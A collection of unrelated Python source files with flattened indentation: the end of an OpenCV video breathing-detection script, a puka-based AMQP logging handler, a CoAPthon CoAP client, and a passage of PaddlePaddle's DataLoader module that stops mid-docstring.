largest_mask[img_labeled == re[2]] = lab_val
cnts3 = cv2.findContours(largest_mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts3 = cnts3[0] if imutils.is_cv2() else cnts3[1]
X1 = cnts3[0][0]
X2 = cnts3[1][0]
X3 = cnts3[2][0]
cX1 = X1[0][0]
cY1 = X1[0][1]
cX2 = X2[0][0]
cY2 = X2[0][1]
cX3 = X3[0][0]
cY3 = X3[0][1]
cv2.circle(frame, (cX1, cY1), red, (0, 255, 255), 3)
cv2.circle(frame, (cX2, cY2), red, (0, 255, 255), 3)
cv2.circle(frame, (cX3, cY3), red, (0, 255, 255), 3)
cv2.putText(frame,'Breathing',(10,40),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,255),1,cv2.LINE_AA)
cv2.imshow('Frame',frame)
else:
t = t+1
if t > 40:
if lab_stats[1:, 4].size > 0 and start == 1:
t = 0
cv2.putText(frame,'Not Breathing',(10,40),cv2.FONT_HERSHEY_SIMPLEX,1,(0,0,255),1,cv2.LINE_AA)
cv2.imshow('Frame',frame)
else:
cv2.circle(frame, (cX1, cY1), red, (0, 255, 255), 3)
cv2.circle(frame, (cX2, cY2), red, (0, 255, 255), 3)
cv2.circle(frame, (cX3, cY3), red, (0, 255, 255), 3)
cv2.putText(frame,'Breathing',(10,40),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,255),1,cv2.LINE_AA)
cv2.imshow('Frame',frame)
previous_frame = current_frame
k = cv2.waitKey(1) & 0xff
if k == 27:
break
cap.release()
cv2.destroyAllWindows()
Tk().withdraw()
vid_path = askopenfilename(filetypes =(("Video File", "*.mp4"),("Video File","*.avi"),("Video File", "*.flv"),("All Files","*.*")),
title = "Choose a video.")
no_of_threads = 1
var_blur = 3
thred = []
jobs = []
for i in range(0, no_of_threads):
thred = threading.Thread(target=main)
jobs.append(thred)
for j in jobs:
j.start()
for j in jobs:
j.join()
|
amqp_puka.py
|
from contexture import __version__
import json
import logging
import os
# import pika
import puka
from Queue import Queue, Full, Empty
import resource
import socket
import sys
import time
import threading
import uuid
# Don't make this __name__. Used by logging config to wire amqp handler.
LOGGER = logging.getLogger('contexture.internal')
# LOGGER.setLevel(logging.DEBUG)
LOGGER.debug("LOGGER.debug works")
def faux_record(obj):
class faux:
msg = obj
created = time.time()
routing_key = obj.get('routing_key', 'lc-handler')
return faux
def qitems(queue):
while True:
try:
yield queue.get_nowait()
except Empty:
raise StopIteration
# TODO: add heartbeat?
class AMQPHandler(logging.Handler):
INTERVAL = 1
# singleton stuff
_thread = None
_queue = None
_client = None
def __init__(self, url=None,
exchange='lc-topic',
exchange_type='topic',
user='guest',
password='guest',
host='localhost',
port=5672,
virtual_host='/',
headers={},
singleton=True,
maxqueue=300,
reconnect_wait=10,
):
if not url:
self._url = 'amqp://%s:%s@%s:%s%s' % (user, password, host, port, virtual_host)
# if url:
# self._conn_params = pika.URLParameters(url)
# else:
# creds = pika.credentials.PlainCredentials(user, password)
# self._conn_params = pika.ConnectionParameters(host=host,
# port=port,
# virtual_host=virtual_host,
# credentials=creds)
self._exchange = exchange
self._headers = headers
self._type = exchange_type
self._running = True
self._guid = str(uuid.uuid4())
env = dict(host=socket.gethostname(),
pid=os.getpid(),
argv=sys.argv,
tid=threading.current_thread().ident,
contexture=__version__,
)
self._headers['hostname'] = env['host']
self._throttled = 0
self._reconnect_wait = reconnect_wait
# Rely on attributes resolving up to the class level
# for singleton behavior.
if singleton:
target = self.__class__
else:
target = self
if not target._queue or not singleton:
target._queue = Queue(maxqueue)
target._thread = threading.Thread(target=self.run)
# if not target._thread.is_active():
LOGGER.debug('Starting daemonized thread')
target._thread.daemon = True
target._thread.start()
self.emit_obj(env)
logging.Handler.__init__(self)
def publish_record(self, record):
obj = record.msg
# Sometimes regular logging messages find their way into the queue
# (by misconfiguration, for example). Ignore them.
if not isinstance(obj, dict):
return
obj['time_out'] = time.time()
obj['time_in'] = record.created
# A little redundant, but, again, why not
obj['qtime'] = (obj['time_out'] - obj['time_in'])
obj['qlen'] = self._queue.qsize()
obj['handler_id'] = self._guid
headers = self._headers.copy()
headers.update(obj.pop('headers', {}))
# What happends if destination is None?
destination = obj.pop('routing_key', 'default')
exchange = obj.pop('exchange', self._exchange)
try:
message = json.dumps(obj, default=lambda x: repr(x))
except Exception, e:
message = json.dumps(dict(error=repr(e)))
if self._running and self._client:
LOGGER.debug("publishing %s", message)
return self._client.basic_publish(exchange=exchange, routing_key=destination,
body=message, headers=headers)
else:
LOGGER.debug('Discarding %s', message)
def emit(self, record):
try:
self._queue.put_nowait(record)
except Full:
if self._throttled == 0:
size = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
LOGGER.warning('Queue full, discarding. Used %sK', size)
self._throttled += 1
def emit_obj(self, obj):
self.emit(faux_record(obj))
def publish_items(self):
batch = 0
promise = None
if self._running:
for item in qitems(self._queue):
LOGGER.debug('Publishing %r', item)
promise = self.publish_record(item)
# self._queue.task_done()
batch += 1
if self._throttled > 0:
LOGGER.warning('Queue overflow recovered, %s messages lost'
% self._throttled)
self._throttled = 0
self.publish_record(faux_record({'recovered': self._throttled}))
else:
LOGGER.warning('No channel, keeping messages')
return batch, promise
def schedule_burst(self, t, result):
while True and self._running:
batch, promise = self.publish_items()
if batch:
LOGGER.debug("Purging %s queue items (promise %s)", batch, promise)
for x in xrange(batch):
self._queue.task_done()
else:
time.sleep(1)
if promise:
LOGGER.debug("Setting promised callback")
self._client.set_callback(promise, self.schedule_burst)
break
def on_connect(self, t, result):
LOGGER.debug("Declaring exchange %s", self._exchange)
self._client.exchange_declare(exchange=self._exchange,
type=self._type,
durable=True,
callback=self.schedule_burst)
def run(self):
while True:
try:
self._running = True
self._client = puka.Client(self._url)
self._client.connect(callback=self.on_connect)
# self._client.set_callback(promise, self.schedule_burst)
LOGGER.debug("Starting client loop")
self._client.loop()
LOGGER.debug("Client loop stopped.")
except Exception, e:
if self._reconnect_wait:
LOGGER.info('Sleeping for %s seconds and retrying'
% self._reconnect_wait)
# LOGGER.exception(e)
self._running = False
time.sleep(self._reconnect_wait)
else:
LOGGER.debug("No reconnect, KTHXBAI")
def queue_join(self):
if self._running:
self._queue.join()
def stop(self):
self.emit_obj({"stopping": True})
if self._running:
self._running = False
LOGGER.debug("running = False")
def __del__(self):
self.close()
def close(self):
self.stop()
|
coap.py
|
import logging.config
import os
import random
import socket
import threading
import time
from coapthon import defines
from coapthon.layers.blocklayer import BlockLayer
from coapthon.layers.messagelayer import MessageLayer
from coapthon.layers.observelayer import ObserveLayer
from coapthon.layers.requestlayer import RequestLayer
from coapthon.messages.message import Message
from coapthon.messages.request import Request
from coapthon.messages.response import Response
from coapthon.serializer import Serializer
from coapthon.utils import create_logging
__author__ = 'Giacomo Tanganelli'
if not os.path.isfile("logging.conf"):
create_logging()
logger = logging.getLogger(__name__)
logging.config.fileConfig("logging.conf", disable_existing_loggers=False)
class CoAP(object):
"""
Client class to perform requests to remote servers.
"""
def __init__(self, server, starting_mid, callback, sock=None, cb_ignore_read_exception=None, cb_ignore_write_exception=None):
"""
Initialize the client.
:param server: Server address for incoming connections
:param callback:the callback function to be invoked when a response is received
:param starting_mid: used for testing purposes
:param sock: if a socket has been created externally, it can be used directly
:param cb_ignore_read_exception: Callback function to handle exception raised during the socket read operation
:param cb_ignore_write_exception: Callback function to handle exception raised during the socket write operation
"""
self._currentMID = starting_mid
self._server = server
self._callback = callback
self._cb_ignore_read_exception = cb_ignore_read_exception
self._cb_ignore_write_exception = cb_ignore_write_exception
self.stopped = threading.Event()
self.to_be_stopped = []
self._messageLayer = MessageLayer(self._currentMID)
self._blockLayer = BlockLayer()
self._observeLayer = ObserveLayer()
self._requestLayer = RequestLayer(self)
addrinfo = socket.getaddrinfo(self._server[0], None)[0]
if sock is not None:
self._socket = sock
elif addrinfo[0] == socket.AF_INET:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
else:
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._receiver_thread = None
def close(self):
"""
Stop the client.
"""
self.stopped.set()
for event in self.to_be_stopped:
event.set()
if self._receiver_thread is not None:
self._receiver_thread.join()
try:
# Python does not close the OS FD on socket.close()
# Ensure OS socket is closed with shutdown to prevent FD leak
self._socket.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
self._socket.close()
@property
def current_mid(self):
"""
Return the current MID.
:return: the current mid
"""
return self._currentMID
@current_mid.setter
def current_mid(self, c):
"""
Set the current MID.
:param c: the mid to set
"""
assert isinstance(c, int)
self._currentMID = c
def send_message(self, message):
"""
Prepare a message to send on the UDP socket. Eventually set retransmissions.
:param message: the message to send
"""
if isinstance(message, Request):
request = self._requestLayer.send_request(message)
request = self._observeLayer.send_request(request)
request = self._blockLayer.send_request(request)
transaction = self._messageLayer.send_request(request)
self.send_datagram(transaction.request)
if transaction.request.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.request)
elif isinstance(message, Message):
message = self._observeLayer.send_empty(message)
message = self._messageLayer.send_empty(None, None, message)
self.send_datagram(message)
def end_observation(self, token):
"""
Remove an observation token from our records.
:param token: the token for the observation
"""
dummy = Message()
dummy.token = token
dummy.destination = self._server
self._observeLayer.remove_subscriber(dummy)
@staticmethod
def _wait_for_retransmit_thread(transaction):
"""
Only one retransmit thread at a time, wait for other to finish
"""
if hasattr(transaction, 'retransmit_thread'):
while transaction.retransmit_thread is not None:
logger.debug("Waiting for retransmit thread to finish ...")
time.sleep(0.01)
continue
def _send_block_request(self, transaction):
"""
A former request resulted in a block wise transfer. With this method, the block wise transfer
will be continued, including triggering of the retry mechanism.
:param transaction: The former transaction including the request which should be continued.
"""
transaction = self._messageLayer.send_request(transaction.request)
# ... but don't forget to reset the acknowledge flag
transaction.request.acknowledged = False
self.send_datagram(transaction.request)
if transaction.request.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.request)
def send_datagram(self, message):
"""
Send a message over the UDP socket.
:param message: the message to send
"""
host, port = message.destination
logger.debug("send_datagram - " + str(message))
serializer = Serializer()
raw_message = serializer.serialize(message)
try:
self._socket.sendto(raw_message, (host, port))
except Exception as e:
if self._cb_ignore_write_exception is not None and callable(self._cb_ignore_write_exception):
if not self._cb_ignore_write_exception(e, self):
raise
if self._receiver_thread is None or not self._receiver_thread.isAlive():
self._receiver_thread = threading.Thread(target=self.receive_datagram)
self._receiver_thread.start()
def _start_retransmission(self, transaction, message):
"""
Start the retransmission task.
:type transaction: Transaction
:param transaction: the transaction that owns the message that needs retransmission
:type message: Message
:param message: the message that needs the retransmission task
"""
with transaction:
if message.type == defines.Types['CON']:
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
transaction.retransmit_stop = threading.Event()
self.to_be_stopped.append(transaction.retransmit_stop)
transaction.retransmit_thread = threading.Thread(target=self._retransmit,
name=str('%s-Retry-%d' % (threading.current_thread().name, message.mid)),
args=(transaction, message, future_time, 0))
transaction.retransmit_thread.start()
def _retransmit(self, transaction, message, future_time, retransmit_count):
"""
Thread function to retransmit the message in the future
:param transaction: the transaction that owns the message that needs retransmission
:param message: the message that needs the retransmission task
:param future_time: the amount of time to wait before a new attempt
:param retransmit_count: the number of retransmissions
"""
with transaction:
logger.debug("retransmit loop ... enter")
while retransmit_count <= defines.MAX_RETRANSMIT \
and (not message.acknowledged and not message.rejected) \
and not transaction.retransmit_stop.isSet():
transaction.retransmit_stop.wait(timeout=future_time)
if not message.acknowledged and not message.rejected and not transaction.retransmit_stop.isSet():
retransmit_count += 1
future_time *= 2
if retransmit_count < defines.MAX_RETRANSMIT:
logger.debug("retransmit loop ... retransmit Request")
self.send_datagram(message)
if message.acknowledged or message.rejected:
message.timeouted = False
else:
logger.warning("Give up on message {message}".format(message=message.line_print))
message.timeouted = True
# Inform the user, that nothing was received
self._callback(message)
try:
self.to_be_stopped.remove(transaction.retransmit_stop)
except ValueError:
pass
transaction.retransmit_stop = None
transaction.retransmit_thread = None
logger.debug("retransmit loop ... exit")
def receive_datagram(self):
"""
Receive datagram from the UDP socket and invoke the callback function.
"""
logger.debug("Start receiver Thread")
while not self.stopped.isSet():
self._socket.settimeout(0.1)
try:
datagram, addr = self._socket.recvfrom(1152)
except socket.timeout: # pragma: no cover
continue
except Exception as e: # pragma: no cover
if self._cb_ignore_read_exception is not None and callable(self._cb_ignore_read_exception):
if self._cb_ignore_read_exception(e, self):
continue
return
else: # pragma: no cover
if len(datagram) == 0:
logger.debug("Exiting receiver Thread due to orderly shutdown on server end")
return
serializer = Serializer()
try:
host, port = addr
except ValueError:
host, port, tmp1, tmp2 = addr
source = (host, port)
message = serializer.deserialize(datagram, source)
if isinstance(message, Response):
logger.debug("receive_datagram - " + str(message))
transaction, send_ack = self._messageLayer.receive_response(message)
if transaction is None: # pragma: no cover
continue
self._wait_for_retransmit_thread(transaction)
if send_ack:
self._send_ack(transaction)
self._blockLayer.receive_response(transaction)
if transaction.block_transfer:
self._send_block_request(transaction)
continue
elif transaction is None: # pragma: no cover
self._send_rst(transaction)
return
self._observeLayer.receive_response(transaction)
if transaction.notification: # pragma: no cover
ack = Message()
ack.type = defines.Types['ACK']
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
self._callback(transaction.response)
else:
self._callback(transaction.response)
elif isinstance(message, Message):
self._messageLayer.receive_empty(message)
logger.debug("Exiting receiver Thread due to request")
def _send_ack(self, transaction):
"""
Sends an ACK message for the response.
:param transaction: transaction that holds the response
"""
ack = Message()
ack.type = defines.Types['ACK']
if not transaction.response.acknowledged:
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
def _send_rst(self, transaction): # pragma: no cover
"""
Sends an RST message for the response.
:param transaction: transaction that holds the response
"""
rst = Message()
rst.type = defines.Types['RST']
if not transaction.response.acknowledged:
rst = self._messageLayer.send_empty(transaction, transaction.response, rst)
self.send_datagram(rst)
|
reader.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import core
import sys
import six
import numpy as np
import threading
import paddle
from .framework import Program, Variable, program_guard, default_main_program, default_startup_program, in_dygraph_mode, cpu_places, _current_expected_place
from .executor import global_scope
from .data_feeder import DataFeeder, BatchedTensorProvider
from .multiprocess_utils import multiprocess_queue_set, CleanupFuncRegistrar, _cleanup_mmap, _cleanup, _set_SIGCHLD_handler
from .dataloader import BatchSampler, Dataset, IterableDataset
from .dataloader.dataloader_iter import _DataLoaderIterSingleProcess, _DataLoaderIterMultiProcess, _DatasetKind, default_collate_fn
from .dataloader.batch_sampler import _InfiniteIterableSampler
from .layers.io import monkey_patch_reader_methods, _copy_reader_var_, double_buffer
from .unique_name import UniqueNameGenerator
import logging
import warnings
### Dygraph DataLoader configs ###
import os
import multiprocessing
import signal
# NOTE: queue has a different name in python2 and python3
if six.PY2:
import Queue as queue
else:
import queue
# NOTE: [ avoid hanging & failed quickly ] These value is used in getting data from another process
QUEUE_GET_TIMEOUT = 60
__all__ = ['PyReader', 'DataLoader', 'default_collate_fn']
data_loader_unique_name_generator = UniqueNameGenerator()
KEEP_DATA_LOADER_ORDER = True
USE_PINNED_MEMORY = None
def keep_data_loader_order(*args):
global KEEP_DATA_LOADER_ORDER
if len(args) == 0:
return KEEP_DATA_LOADER_ORDER
else:
assert len(args) == 1 and isinstance(args[0], bool)
KEEP_DATA_LOADER_ORDER = args[0]
def use_pinned_memory(*args):
global USE_PINNED_MEMORY
if len(args) == 0:
return USE_PINNED_MEMORY
else:
assert len(args) == 1 and isinstance(args[0], bool)
USE_PINNED_MEMORY = args[0]
def _convert_places(places):
if not isinstance(places, (list, tuple)):
places = [places]
ret = []
for p in places:
if not isinstance(p, core.Place):
tmp = core.Place()
tmp.set_place(p)
p = tmp
ret.append(p)
return ret
# NOTE(chenweihang): _reader_process_loop must be top level method to be pickled
def _reader_process_loop(batch_reader, data_queue):
try:
# set signal handler
core._set_process_signal_handler()
# NOTE: [ mmap files clear ] When the child process exits unexpectedly,
# some shared memory objects may have been applied for but have not yet
# been put into the inter-process Queue. This part of the object needs
# to be cleaned up when the process ends.
CleanupFuncRegistrar.register(_cleanup_mmap)
for batch in batch_reader():
tensor_list = core._convert_to_tensor_list(batch)
data_queue.put(tensor_list)
core._remove_tensor_list_mmap_fds(tensor_list)
data_queue.put(None)
except KeyboardInterrupt:
# NOTE: Main process will raise KeyboardInterrupt anyways, ignore it in child process
pass
except:
six.reraise(*sys.exc_info())
class DataLoaderBase(object):
def __init__(self):
self._places = None
def __call__(self):
return self
def next(self):
'''
Get the next item in the DataLoader object. This method
should not be called by users directly. It is used for
implementing iterator protocol of Python 2.x inside
PaddlePaddle framework.
'''
return self.__next__()
def __iter__(self):
raise NotImplementedError()
def __next__(self):
raise NotImplementedError()
@classmethod
def _check_input_array(cls, item):
arr = np.asarray(item)
if arr.dtype == np.object:
raise TypeError(
"\n\tFaild to convert input data to a regular ndarray :\n\t* Usually "
"this means the input data contains nested lists with different lengths. "
"\n\t* Check the reader function passed to 'decorate_batch_generator'"
" to locate the data causes this issue.\n\t* Please consider using "
"'fluid.create_lod_tensor' to convert it to a LoD-Tensor.")
return arr
class DataLoader(object):
"""
DataLoader prodives an iterator which iterates given dataset
once by the batch_sampler.
DataLoader supports single-process and multi-prcess data loading,
multi-process workers will be used to load data asynchronously if
:attr:`num_workers` is set as a positive number.
DataLoader supports map-style dataset and iterable-style dataset.
For map-style datast(can get a sample from dataset with a given
index), please see :code:`paddle.io.Dataset`.
For iterable-style datast(get samples from dataset iteratively,
like a Python iterator), please see :code:`paddle.io.IterableDataset`.
For :code:`batch_sampler` please see :code:`paddle.io.BatchSampler`
**Disable automatic batching**
In certain cases such as some NLP tasks, instead of automatic batching,
handling batching manually in dataset is needed by users. For these
cases, automatic batching is disabled if both :attr:`batch_size` and
:attr:`batch_sampler` is set as None, each data got from :attr:`dataset`
should be batched data and will be processed with function define by
:attr:`collate_fn` or :attr:`default_collate_fn`.
.. note::
When automatic batching is disabled, :attr:`default_collate_fn` will
do nothing to data from dataset.
Args:
dataset(Dataset): the dataset to load data from, should be an
instance of subclass of :code:`paddle.io.Dataset` or
:code:`paddle.io.IterableDataset`.
feed_list (list(Tensor)|tuple(Tensor)): feed Tensor list.
The Tensors should be created by :code:`paddle.static.data()`.
:attr:`feed_list` must be set if :attr:`return_list` is
False. Default None.
places(list(Place)|tuple(Place)|optional): a list of Place,
to put data onto, :attr:`places` can be None, if
:attr:`places` is None, default place(CPUPlace or CUDAPlace(0))
will be used. Default None.
return_list (bool): whether the return value on each device is
presented as a list. If :attr:`return_list=False`, the return
value on each device would be a dict of str -> Tensor, where
the key of the dict is the name of each fed Tensors. If
:attr:`return_list=True`, the return value on each device would
be a list(Tensor). :attr:`return_list` can only be True
in dynamic graph mode. Default True.
batch_sampler(BatchSampler): an instance of `paddle.io.BatchSampler`
to generate batch indices to draw samples from :attr:`dataset`
and combine a batch. Default None.
batch_size(int|None): sample number in a mini-batch, a substitution
parameter for :attr:`batch_sampler`, if :attr:`batch_sampler`
is not set, a default `paddle.io.BatchSampler` will be used
and initialize by :attr:`batch_size`, :attr:`shuffle` and
:attr:`drop_last`. Default 1.
shuffle(bool): whther to shuffle indices order before genrate
batch indices, a substitution parameter for :attr:`batch_sampler`
see :attr:`batch_size`. Default False.
drop_last(bool): whether drop the last incomplete batch dataset size
is not divisible by the batch size, a substitution parameter
for :attr:`batch_sampler`, see :attr:`batch_size`. Default False
collate_fn(callable): function to generate mini-batch data by merging
the sample list, None for only stack each fields of sample in axis
0(same as :attr::`np.stack(..., axis=0)`). Default None
num_workers(int): the number of subprocess to load data, 0 for no
subprocess used and loading data in main process. Default 0
use_buffer_reader (bool): whether to use bufferred reader.
If use_buffer_reader=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data. Default True.
use_shared_memory (bool): whether to use shared memory to speed up
putting data into inter-process queue, set :attr:`use_shared_memory`
as True only when the shared memory space on your machine(e.g.
space of '/dev/shm' on Linux operating sysytem) is large enough.
Shared memory will only be enabled in multi-process mode(num_workers
> 0). Default True.
timeout(int): the timeout value for getting data form output queue
of subprocesses. Default 0.
worker_init_fn(callable): init function which will be called with
worker id on each subproces starting if not set as None. Default
None.
Returns:
DataLoader: an iterable object for data iterating, each elemnet of the generated data is a Tensor.
Examples:
.. code-block:: python
import numpy as np
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from paddle.io import Dataset, BatchSampler, DataLoader
BATCH_NUM = 20
BATCH_SIZE = 16
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
# define a random dataset
class RandomDataset(Dataset):
def __init__(self, num_samples):
self.num_samples = num_samples
def __getitem__(self, idx):
image = np.random.random([IMAGE_SIZE]).astype('float32')
label = np.random.randint(0, CLASS_NUM - 1, (1, )).astype('int64')
return image, label
def __len__(self):
return self.num_samples
dataset = RandomDataset(BATCH_NUM * BATCH_SIZE)
class SimpleNet(nn.Layer):
def __init__(self):
super(SimpleNet, self).__init__()
self.fc = nn.Linear(IMAGE_SIZE, CLASS_NUM)
def forward(self, image, label=None):
return self.fc(image)
simple_net = SimpleNet()
opt = paddle.optimizer.SGD(learning_rate=1e-3,
parameters=simple_net.parameters())
loader = DataLoader(dataset,
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=2)
for e in range(EPOCH_NUM):
for i, (image, label) in enumerate(loader()):
out = simple_net(image)
loss = F.cross_entropy(out, label)
avg_loss = paddle.mean(loss)
avg_loss.backward()
opt.minimize(avg_loss)
simple_net.clear_gradients()
print("Epoch {} batch {}: loss = {}".format(e, i, np.mean(loss.numpy())))
.. note::
For reading iterable dataset with multiprocess Dataloader,
please see :code:`paddle.io.IterableDataset`
"""
def __init__(self,
dataset,
feed_list=None,
places=None,
return_list=True,
batch_sampler=None,
batch_size=1,
shuffle=False,
drop_last=False,
collate_fn=None,
num_workers=0,
use_buffer_reader=True,
use_shared_memory=True,
timeout=0,
worker_init_fn=None):
self.return_list = return_list
self.collate_fn = collate_fn
self.use_buffer_reader = use_buffer_reader
self.worker_init_fn = worker_init_fn
assert isinstance(dataset, Dataset), \
"dataset should be subclass instance of paddle.io.Dataset"
self.dataset = dataset
if not return_list and not in_dygraph_mode():
assert feed_list is not None, \
"feed_list should be set when return_list=False"
self.feed_list = feed_list
if places is None:
places = _current_expected_place()
self.places = _convert_places(places)
assert num_workers >= 0, "num_workers should be a non-negative value"
if num_workers > 0 and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"DataLoader with multi-process mode is not supported on MacOs and Windows currently." \
" Please use signle-process mode with num_workers = 0 instead")
num_workers = 0
self.num_workers = num_workers
self.use_shared_memory = use_shared_memory
if use_shared_memory and num_workers == 0:
self.use_shared_memory = False
assert timeout >= 0, "timeout should be a non-negative value"
self.timeout = timeout
if isinstance(dataset, IterableDataset):
self.dataset_kind = _DatasetKind.ITER
if shuffle:
raise ValueError(
"IterableDataset not support shuffle, but got shuffle={}".
format(shuffle))
if batch_sampler is not None:
raise ValueError(
"IterableDataset expect unspecified batch_sampler")
else:
self.dataset_kind = _DatasetKind.MAP
if batch_sampler is not None:
assert batch_size == 1 and not shuffle and not drop_last, \
"batch_size/shuffle/drop_last should not be set when " \
"batch_sampler is given"
self.batch_sampler = batch_sampler
self.batch_size = None
elif batch_size is None:
self.batch_sampler = None
self.batch_size = None
else:
assert batch_size > 0, \
"batch_size should be None or a positive value when " \
"batch_sampler is not given"
self.batch_size = batch_size
if isinstance(dataset, IterableDataset):
self.batch_sampler = _InfiniteIterableSampler(dataset,
batch_size)
else:
self.batch_sampler = BatchSampler(
dataset=dataset,
batch_size=batch_size,
shuffle=shuffle,
drop_last=drop_last)
self.auto_collate_batch = self.batch_sampler is not None
self.pin_memory = False
if in_dygraph_mode():
self.pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
def __len__(self):
if self.dataset_kind == _DatasetKind.ITER:
raise ValueError("length of IterableDataset not supported")
else:
if self.auto_collate_batch:
return len(self.batch_sampler)
else:
return len(self.dataset)
def __iter__(self):
if self.num_workers == 0:
return _DataLoaderIterSingleProcess(self)
else:
return _DataLoaderIterMultiProcess(self)
def __call__(self):
return self.__iter__()
@staticmethod
def from_generator(feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
use_multiprocess=False,
drop_last=True):
"""
.. warning::
This API will be deprecated in the future, it is recommended to use
:code:`paddle.io.DataLoader` which supports multi-processes acceleration.
.. note::
**The framework ensures that the data loading order of DataLoader is exactly the same as the user-defined data source.**
Create a DataLoader object for loading data from Python generator.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously.
The created DataLoader object provides 3 methods to set the data source
:code:`set_sample_generator` , :code:`set_sample_list_generator` and
:code:`set_batch_generator` . Please see the following example codes
to know their usages.
If iterable = True, the created DataLoader object is a Python generator
object, which is iterable using for-range loop.
If iterable = False, the created DataLoader object provides
:code:`start()` and :code:`reset()` method to control the data reading
process.
Args:
feed_list (list(Tensor)|tuple(Tensor)): feed Tensor list.
The Tensors should be created by :code:`fluid.data()`.
capacity (int): capacity of the queue maintained in DataLoader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created DataLoader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed Tensors. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
use_multiprocess (bool): whether to use multi-process to speed up
the data loading process in dygraph. Note: this parameter only
can be used in the dygraph mode. In the static graph mode,
whether this parameter is set or not has no effect.
The Default value is False.
drop_last (bool): whether to drop the last batches whose number is
less than the CPU core/GPU card number. The default value is
True. In training phase, users should not set drop_last=False,
because all CPU cores/GPU cards must read data from DataLoader.
In inference phase, users can set drop_last=False, so that the
last batches whose number is less than the CPU core/GPU card
number can be tested.
Returns:
loader (DataLoader): the created DataLoader object.
Examples 1:
.. code-block:: python
'''
Example in static graph mode
'''
import numpy as np
import paddle
import paddle.static as static
import paddle.nn.functional as F
BATCH_NUM = 10
BATCH_SIZE = 16
EPOCH_NUM = 4
CLASS_NUM = 10
ITERABLE = True # whether the created DataLoader object is iterable
USE_GPU = False # whether to use GPU
DATA_FORMAT = 'batch_generator' # data format of data source user provides
paddle.enable_static()
def simple_net(image, label):
fc_tmp = static.nn.fc(image, size=CLASS_NUM)
cross_entropy = F.softmax_with_cross_entropy(image, label)
loss = paddle.mean(cross_entropy)
sgd = paddle.optimizer.SGD(learning_rate=1e-3)
sgd.minimize(loss)
return loss
def get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
# If the data generator yields one sample each time,
# use DataLoader.set_sample_generator to set the data source.
def sample_generator_creator():
def __reader__():
for _ in range(BATCH_NUM * BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
yield image, label
return __reader__
# If the data generator yield list of samples each time,
# use DataLoader.set_sample_list_generator to set the data source.
def sample_list_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
sample_list = []
for _ in range(BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
sample_list.append([image, label])
yield sample_list
return __reader__
# If the data generator yields a batch each time,
# use DataLoader.set_batch_generator to set the data source.
def batch_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = get_random_images_and_labels([BATCH_SIZE, 784], [BATCH_SIZE, 1])
yield batch_image, batch_label
return __reader__
# If DataLoader is iterable, use for loop to train the network
def train_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
for data in loader():
exe.run(prog, feed=data, fetch_list=[loss])
# If DataLoader is not iterable, use start() and reset() method to control the process
def train_non_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
loader.start() # call DataLoader.start() before each epoch starts
try:
while True:
exe.run(prog, fetch_list=[loss])
except paddle.core.EOFException:
loader.reset() # call DataLoader.reset() after catching EOFException
def set_data_source(loader, places):
if DATA_FORMAT == 'sample_generator':
loader.set_sample_generator(sample_generator_creator(), batch_size=BATCH_SIZE, drop_last=True, places=places)
elif DATA_FORMAT == 'sample_list_generator':
loader.set_sample_list_generator(sample_list_generator_creator(), places=places)
elif DATA_FORMAT == 'batch_generator':
loader.set_batch_generator(batch_generator_creator(), places=places)
else:
raise ValueError('Unsupported data format')
image = static.data(name='image', shape=[None, 784], dtype='float32')
label = static.data(name='label', shape=[None, 1], dtype='int64')
# Define DataLoader
loader = paddle.io.DataLoader.from_generator(feed_list=[image, label], capacity=16, iterable=ITERABLE)
# Define network
loss = simple_net(image, label)
# Set data source of DataLoader
#
# If DataLoader is iterable, places must be given and the number of places must be the same with device number.
